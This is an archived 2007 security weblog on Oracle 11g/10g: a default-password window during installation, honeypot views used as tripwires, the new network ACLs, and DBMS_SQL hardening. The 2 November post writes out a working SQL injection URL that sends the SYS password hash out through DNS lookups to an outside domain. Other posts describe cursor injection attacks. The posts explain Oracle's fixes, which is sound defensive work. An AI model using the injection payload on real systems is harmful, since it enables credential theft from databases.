David Litchfield's Weblog

Home
Archives
NGSSoftware
DatabaseSecurity.com


Greymatter Forums

November 2007
SMTWTFS
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30  

Valid XHTML 1.0!

Powered By Greymatter

RSS 1.0 FEED
RSS 2.0 FEED
Atom 0.3 FEED
Powered by gm-rss 2.0.1
Tuesday, November 13th

Oracle 11g/10g Installation Vulnerability


After investigating 11g the other day I came across an interesting issue. During the installation of Oracle 11g and 10g all accounts, including the SYS and SYSTEM accounts, have their default passwords and only at the end of the install are the passwords changed. This means that there is a window of opportunity for an attacker to log into the database server during the install process. After doing some testing I've found that if a default install is performed then the window of opportunity is c. 2 minutes 15 secs. If you use the Database Configuration Assistant and install the default options for a General Purpose or Transaction Processing (i.e. without sample schemas but install jvm, text, xml db, multimedia, ultrasearch etc) the window is around 20 to 25 seconds. If creating a database using the Datawarehouse option then the window is 35 to 40 seconds. If the Custom is selected from DBCA there is not window. This is because Custom doesn't use a template.

Now the chances of this being exploited are of course really small but it does pose questions when it comes to assurance. If you base line your system after an install can we be really sure it wasn't 0wn3d during the install process and a couple of backdoors planted? The best approach to solving this is not installing Oracle whilst connected to the network. I reported this to Oracle on the 3rd of November and they've since updated their security checklist.
David on 11.13.07 @ 11:24 AM GMT [link]


Tuesday, November 6th

Database tripwires...


I was thinking about the problem of creating a cheap tripwire for database servers that doesn't require a third party agent and it will alert us to when someone's snooping around places in our databases where they shouldn't be snooping. We could set up a honeypot table or view with an appropriately attractive name like USERNAMES_AND_PASSWORDS. Because this is a fake table no-one should ever really be looking at it and we can get the database to alert us when anyone touches it: there's a snooper online.

This could be achieved with a trigger in the case of an UPDATE, INSERT or DELETE of course but not so with a SELECT query. This limitation is easy to fix in Oracle with the use of fine grained access control by setting a policy on the table in question using DBMS_FGA. But what about other database servers that don't have an equivalent? Well, we can still achieve the same results with a simple view.

First off we create a function that does the actual alerting - whatever that happens to be - for example sending a mail to the DBA. Once we've created this function we then create a view that calls this functions - this view becomes our honeypot:

CREATE VIEW USERNAMES_AND_PASSWORDS AS SELECT FOO, BAR FROM TABLE WHERE ALERTFUNC = 1;

Thus when someone's snooping around our database and they look at DBA_OBJECTS / SYSOBJECTS / SYSTABLES and they see a name of USERNAMES_AND_PASSWORDS hopefully their curiosity will get the better of them and they'll do a SELECT thus firing our alert function.

This could be extended to extant views such as DBA/ALL/USER_OBJECTS; if you know none of your application logic queries these views then you could tripwire them up so as to be alerted when someone queries them - a potential snooper. Tripwiring up DBA/ALL/USER_VIEWS might also be a good option if the attacker selects a view's text/body before selecting from the view itself to ensure it's not a trap. They could of course just select from the VIEW$ table to bypass this but then we can hope that most attackers won't smile

David on 11.06.07 @ 01:44 PM GMT [link]


Monday, November 5th

Navy vs. Notre Dame


Yesterday, Navy beat Notre Dame. Before yesterday, the only thing I knew about the fighting Irish (other than this appellation) was that some short dude called Rudy played by Sean Austin in the film of the same name once got to go on field and that fictional President Josiah Barlett of West Wing fame was an alumnus. Today I learnt that they'd not lost against the Navy American football in 44 years. So what does this have to do with security? It just goes to show that if you keep on trying eventually you'll win. Go Navy!

David on 11.05.07 @ 11:27 PM GMT [link]


Sunday, November 4th

A new SQL Injection Breach


Via Adam (thanks, brother!), a confirmed SQL injection based breach has recently been announced: Scarborough & Tweed, an online distinctive gift e-outlet based in Pleasantville, NY, has reported a breach. This is a black and white case of SQL injection as they say so. This is fantastic - the more colourful a breach notification can be the better - give us the details!!! To be honest I don't care if my information is 0wn3d - I care *how* it is 0wn3d. The only way industry can improve is by learning by the mistakes of previous netstumblers. If those who suffer such breaches don't suffer unto us the details then it's not worth the paper it's written on.
David on 11.04.07 @ 02:19 AM GMT [link]


Saturday, November 3rd

11g UTL_HTTP update


So I've installed 11g on my laptop to revisit this. If you have the connect privilege for a host you don't need the resolve privilege. Further, if you've been given the connect privilege to any host you still don't need the resolve:

SQL> EXEC DBMS_NETWORK_ACL_ADMIN.CREATE_ACL(acl=>'www.xml', description=>'WWW ACL', principal=>'SCOTT', is_grant=>true, privilege=>'connect');

PL/SQL procedure successfully completed.

SQL> EXEC DBMS_NETWORK_ACL_ADMIN.ASSIGN_ACL(acl=>'www.xml', host=>'*');

PL/SQL procedure successfully completed.

SQL> connect scott/tiger
Connected.
SQL> select utl_http.request('www.databasesecurity.com') from dual;

UTL_HTTP.REQUEST('WWW.DATABASESECURITY.COM')
------------------------------------------------------------------------------
"http://www.w3.org/TR/html4/loose.dtd">


Database Security
...
...


David on 11.03.07 @ 09:11 AM GMT [link]


Friday, November 2nd

Another set of 11g Security Improvements


Previous versions of Oracle came with a ready made set of networking PL/SQL packages namely: UTL_TCP, UTL_HTTP, UTL_SMTP, UTL_MAIL and UTL_INADDR. PUBLIC had the execute permission on these packages and this posed a security risk. For example, in a SQL injection attack via a web server, an attacker could exfiltrate data out of the network over UDP port 53 masquerading as DNS queries. This is accomplished by injecting UTL_INADDR.GET_HOST_ADDRESS into the vector:

http://www.example.com/foo.jsp?p_vector=bar'||UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = 'SYS')||'.ngssoftware.com')--

Here, the password for the SYS user ("D3AAEDA7EDA1B4AB") is selected from DBA_USERS and prefixed to ".ngssoftware.com" and then passed as the hostname to lookup using UTL_INADDR. This causes the database server to issue a DNS query to D3AAEDA7EDA1B4AB.ngssoftware.com. Now, as long as the attacker controls the ngssoftware.com domain name server he eventually gets the DNS query and thus the data he's interested in. Another attack involves exfiltrating data using UTL_HTTP.REQUEST over the web.

Anyway, long story short, before people can use these network utilities now they need speciall permissions that are granted via a new package called DBMS_NETWORK_ACL_ADMIN using the CREATE_ACL procedure. To use UTL_TCP, UTL_HTTP, UTL_MAIL and UTL_SMTP they need to be issued the "connect" privilege and the "resolve" privilege to use "UTL_INADDR".

Unfortunately, I'm at the airport right now and away from my 11g box and so can't test this but I'm wondering if you have the "connect" privilege on say "UTL_HTTP" whether you also need the "resolve" privilege to be able to lookup the remote host. If you don't, then it seems a bit redundant requiring "resolve" on UTL_INADDR because you can still essentially indirectly resolve via UTL_HTTP.

Anyway, all of this is another good security enhancement to 11g. The more I look the more I'm liking it.


David on 11.02.07 @ 07:26 AM GMT [link]


Burp Sequencer and the Web Application Hacker's Handbook


Talking of breaking PRNGs and Michal Zalewski's stompy, one of my colleagues, Daf Stuttard, recently released the burp sequencer, a stompy ++ if you will. Daf is also the co-author along with Marcus Pinto of the recently released Web Application Hacker's Handbook, the lastest of the Wiley Hacker's Handbook series that started with the Shellcoder's Handbook. If you're involved in web application design and development or security assessment I'd recommend putting it on your Christmas wish list - or if you're like me and can't wait that long you can always order it now smile
David on 11.02.07 @ 06:54 AM GMT [link]


Thursday, November 1st

Oracle 11g DBMS_SQL Security Changes


Late last year I published a paper describing a new class of vulnerability in Oracle I called "cursor snarfing". This involves causing an exception to occur in a PL/SQL package that uses DBMS_SQL and cursors but fails to close them in exception handling code. An attacker can then steal or snarf this cursor and potentially use it to compromise the security of the server outside of any application logic. Then in February this year I published a paper on "Cursor Injection" that showed how an attacker with only CREATE SESSION privileges could fully exploit any SQL injection flaw to execute entirely arbitrary DDL SQL - for example GRANT DBA TO PUBLIC. This is achieved by creating a cursor with DBMS_SQL and parsing the DDL statement. The cursor is then injected into the attack vector using the DBMS_SQL.EXECUTE function where it is executed with the privileges of the definer of the vulnerable code.

For Oracle 11g, Oracle has introduced some security changes to the DBMS_SQL package to help mitigate the risk of the problems presented in the two papers.

Firstly, cursors (which are referenced just by a number) are no longer created predictably. In 10gr2 and earlier the 1st cursor had a number of 1, the 2nd had a number of 2 and so on. When closed the number would be free to be used again. The point is it was trivial to guess or brute force the number and a cursor's value would typically be between 1 and 300 . 11g no longer generates cursor numbers so predictably - indeed they seem much more random:

1240272433
313122561
2112412728

These are three example cursors created via DBMS_SQL.OPEN_CURSOR. I haven't yet looked to see just how random these numbers and they may or may not be predictable [*] but regardless this is an excellent step forward.

The next improvement has been to shut off access to DBMS_SQL if someone passes an invalid cursor to one of the DBMS_SQL functions or procedures. This is also true of DBMS_SYS_SQL. Thus if I try to inject

dbms_sql.execute(1234567)

and 1234567 is invalid then I'll get an access denied:

ORA-29471: DBMS_SQL access denied
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1528
ORA-06512: at line 1

The only way I can get access to DBMS_SQL again is by logging off and logging back on. The only function that can be called multiple times with impunity is the OPEN_CURSOR function. * Therein potentially lies a weakness. If the random number generator used when a cursor is created is weak then the ability of an attacker to quickly generate a large of cursors and get their values means that an attack could take place by prediciting the next value to be generated. A lot of good work has been done in the area of predicting PRNGs. [See my colleague Chris Anley's paper and Michal Zalewski's work like stompy.]

Further, a hidden parameter "_dbms_sql_security_level", which is turned on by default affects the OPEN_CURSOR function. A new addition to DBMS_SQL in 11g is the ability to specifiy a security level when opening the cursor:

curs = dbms_sql.open_cursor(level);

level can be 0, 1, or 2. 0 turns off security checking in DBMS_SQL but can only be specified if "_dbms_sql_security_level" is turned off. Opening the cursor with a level of 1 requires the executing/binding and parsing user IDs to be the same. Level 2 is more strict and requires id and roles are the same for all operations like binds, describes, executes, fetches etc.

A third change to DBMS_SQL is checking the user ID executing the query and the user ID of the person that parsed the query. If the two don't match an error is generated:

ORA-29470: Effective userid or roles are not the same as when cursor was parsed
ORA-06512: at "SYS.DBMS_SQL", line 1501
ORA-06512: at "SYS.DBMS_SQL", line 1506

Thus, if someone parses their attack query and then injects into the vector their SQL will not be executed.

As is, these three changes put a stop to the abuse that DBMS_SQL was susceptible to. Good work, Oracle. These changes show that someone over there's paid these problems serious attention.

David on 11.01.07 @ 08:55 PM GMT [link]


Inadvertent exposure at root of most breaches?


I've been analysing publicised breaches as part of my research for my upcoming talk at the Information Security Decisions conference in Chicago next Tuesday. Since January 1st 2007, the single largest contributing cause to electronic breaches is not hacking or insider malice but simply inadvertent exposure. Here are the details. Word documents and spreadsheets mistakenly left on a web server or indexed by a search engine account for 20.6% of the 276 breaches, both physical and digital, recorded up to the 23rd of October. This means that a fifth of the breach problem could be solved if companies actively and regularly hunted out such relict documents themselves. Another apsect of the review of breaches is that it seems many of the discoveries were made by well meaning members of the public who found them by accident. This indicates that the real number of breaches is considerably higher: criminals, who we know are actively seeking out such information, aren't going to inform anyone about what they find. The same is true of breaches due to compromise - the number must be higher. Whilst it's impossible to say exactly how many compromises go unnoticed it's easy to ascertain how many compromises go unnoticed for a "long time" before eventually coming to light, for example either through an audit or an investigation of fraudulent activity. That this happens indicates that not all companies have the means to be able to detect a compromise as and when it happens which lends itself to the case that compromises go unnoticed.
David on 11.01.07 @ 10:12 AM GMT [link]